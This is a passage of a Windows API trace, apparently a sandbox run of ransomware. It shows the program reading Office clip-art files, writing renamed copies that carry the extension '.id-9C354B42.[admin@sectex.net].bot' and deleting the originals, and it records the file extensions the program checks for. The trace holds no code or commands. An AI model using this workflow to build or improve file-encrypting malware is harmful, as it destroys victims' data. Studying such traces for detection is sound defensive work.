	[0171.325] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x69d8, lpOverlapped=0x0) returned 1
	[0171.494] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x69e0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x69e0, lpOverlapped=0x0) returned 1
	[0171.495] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.496] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.496] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.496] CloseHandle (hObject=0x3c4) returned 1
	[0171.496] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.496] SetEndOfFile (hFile=0x388) returned 1
	[0171.498] CloseHandle (hObject=0x388) returned 1
	[0171.498] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.499] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185776.wmf")) returned 1
	[0171.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.500] lstrlenW (lpString=".doc") returned 4
	[0171.500] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.500] lstrlenW (lpString=".docx") returned 5
	[0171.500] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.500] lstrlenW (lpString=".pdf") returned 4
	[0171.500] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.500] lstrlenW (lpString=".xls") returned 4
	[0171.500] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.500] lstrlenW (lpString=".xlsx") returned 5
	[0171.500] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.500] lstrlenW (lpString=".ppt") returned 4
	[0171.500] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.500] lstrlenW (lpString=".zip") returned 4
	[0171.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.500] lstrlenW (lpString=".rar") returned 4
	[0171.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.500] lstrlenW (lpString=".bz2") returned 4
	[0171.500] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.500] lstrlenW (lpString=".7z") returned 3
	[0171.500] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.500] lstrlenW (lpString=".dbf") returned 4
	[0171.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.501] lstrlenW (lpString=".1cd") returned 4
	[0171.501] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.501] lstrlenW (lpString=".jpg") returned 4
	[0171.501] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.501] lstrlenW (lpString=".doc") returned 4
	[0171.501] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString=".docx") returned 5
	[0171.501] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.501] lstrlenW (lpString=".pdf") returned 4
	[0171.501] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString=".xls") returned 4
	[0171.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.501] lstrlenW (lpString=".xlsx") returned 5
	[0171.501] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.501] lstrlenW (lpString=".ppt") returned 4
	[0171.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.501] lstrlenW (lpString=".zip") returned 4
	[0171.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.501] lstrlenW (lpString=".rar") returned 4
	[0171.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString=".bz2") returned 4
	[0171.501] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.501] lstrlenW (lpString=".7z") returned 3
	[0171.501] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.502] lstrlenW (lpString=".dbf") returned 4
	[0171.502] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.502] lstrlenW (lpString=".1cd") returned 4
	[0171.502] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185776.WMF") returned 63
	[0171.502] lstrlenW (lpString=".jpg") returned 4
	[0171.502] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.502] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.502] lstrlenW (lpString="J0185806.WMF") returned 12
	[0171.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.503] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=30522) returned 1
	[0171.503] CloseHandle (hObject=0x388) returned 1
	[0171.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf")) returned 0x20
	[0171.503] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.503] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.503] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.504] GetLastError () returned 0x0
	[0171.504] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x773a, lpOverlapped=0x0) returned 1
	[0171.507] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x7740, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x7740, lpOverlapped=0x0) returned 1
	[0171.508] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.508] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.508] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.508] CloseHandle (hObject=0x3c4) returned 1
	[0171.508] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.508] SetEndOfFile (hFile=0x388) returned 1
	[0171.510] CloseHandle (hObject=0x388) returned 1
	[0171.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185806.wmf")) returned 1
	[0171.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.511] lstrlenW (lpString=".doc") returned 4
	[0171.511] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString=".docx") returned 5
	[0171.512] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.512] lstrlenW (lpString=".pdf") returned 4
	[0171.512] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString=".xls") returned 4
	[0171.512] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.512] lstrlenW (lpString=".xlsx") returned 5
	[0171.512] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.512] lstrlenW (lpString=".ppt") returned 4
	[0171.512] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.512] lstrlenW (lpString=".zip") returned 4
	[0171.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.512] lstrlenW (lpString=".rar") returned 4
	[0171.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString=".bz2") returned 4
	[0171.512] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString=".7z") returned 3
	[0171.512] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.512] lstrlenW (lpString=".dbf") returned 4
	[0171.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.512] lstrlenW (lpString=".1cd") returned 4
	[0171.512] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.512] lstrlenW (lpString=".jpg") returned 4
	[0171.512] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.512] lstrlenW (lpString=".doc") returned 4
	[0171.512] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.513] lstrlenW (lpString=".docx") returned 5
	[0171.513] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.513] lstrlenW (lpString=".pdf") returned 4
	[0171.513] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.513] lstrlenW (lpString=".xls") returned 4
	[0171.513] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.513] lstrlenW (lpString=".xlsx") returned 5
	[0171.513] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.513] lstrlenW (lpString=".ppt") returned 4
	[0171.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.513] lstrlenW (lpString=".zip") returned 4
	[0171.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.513] lstrlenW (lpString=".rar") returned 4
	[0171.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.513] lstrlenW (lpString=".bz2") returned 4
	[0171.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.513] lstrlenW (lpString=".7z") returned 3
	[0171.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.513] lstrlenW (lpString=".dbf") returned 4
	[0171.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.513] lstrlenW (lpString=".1cd") returned 4
	[0171.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185806.WMF") returned 63
	[0171.513] lstrlenW (lpString=".jpg") returned 4
	[0171.513] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.513] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.514] lstrlenW (lpString="J0185818.WMF") returned 12
	[0171.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.514] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=35726) returned 1
	[0171.514] CloseHandle (hObject=0x388) returned 1
	[0171.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf")) returned 0x20
	[0171.514] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.515] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.515] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.515] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.515] GetLastError () returned 0x0
	[0171.515] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x8b8e, lpOverlapped=0x0) returned 1
	[0171.518] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x8b90, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x8b90, lpOverlapped=0x0) returned 1
	[0171.519] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.519] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.519] SetEndOfFile (hFile=0x3c4) returned 1
	[0171.519] CloseHandle (hObject=0x3c4) returned 1
	[0171.519] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.519] SetEndOfFile (hFile=0x388) returned 1
	[0171.522] CloseHandle (hObject=0x388) returned 1
	[0171.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.522] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185818.wmf")) returned 1
	[0171.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.523] lstrlenW (lpString=".doc") returned 4
	[0171.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.523] lstrlenW (lpString=".docx") returned 5
	[0171.523] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.523] lstrlenW (lpString=".pdf") returned 4
	[0171.523] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.523] lstrlenW (lpString=".xls") returned 4
	[0171.523] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.523] lstrlenW (lpString=".xlsx") returned 5
	[0171.523] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.523] lstrlenW (lpString=".ppt") returned 4
	[0171.523] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.523] lstrlenW (lpString=".zip") returned 4
	[0171.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.524] lstrlenW (lpString=".rar") returned 4
	[0171.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString=".bz2") returned 4
	[0171.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString=".7z") returned 3
	[0171.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.524] lstrlenW (lpString=".dbf") returned 4
	[0171.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.524] lstrlenW (lpString=".1cd") returned 4
	[0171.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.524] lstrlenW (lpString=".jpg") returned 4
	[0171.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.524] lstrlenW (lpString=".doc") returned 4
	[0171.524] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString=".docx") returned 5
	[0171.524] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0171.524] lstrlenW (lpString=".pdf") returned 4
	[0171.524] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString=".xls") returned 4
	[0171.524] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.524] lstrlenW (lpString=".xlsx") returned 5
	[0171.524] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0171.524] lstrlenW (lpString=".ppt") returned 4
	[0171.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.525] lstrlenW (lpString=".zip") returned 4
	[0171.525] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.525] lstrlenW (lpString=".rar") returned 4
	[0171.525] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.525] lstrlenW (lpString=".bz2") returned 4
	[0171.525] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.525] lstrlenW (lpString=".7z") returned 3
	[0171.525] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.525] lstrlenW (lpString=".dbf") returned 4
	[0171.525] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.525] lstrlenW (lpString=".1cd") returned 4
	[0171.525] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185818.WMF") returned 63
	[0171.525] lstrlenW (lpString=".jpg") returned 4
	[0171.525] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.525] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.525] lstrlenW (lpString="J0185828.WMF") returned 12
	[0171.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.526] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=7796) returned 1
	[0171.526] CloseHandle (hObject=0x388) returned 1
	[0171.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf")) returned 0x20
	[0171.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0171.526] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.526] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185828.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185828.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0171.533] GetLastError () returned 0x0
	[0171.533] ReadFile (in: hFile=0x388, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1e74, lpOverlapped=0x0) returned 1
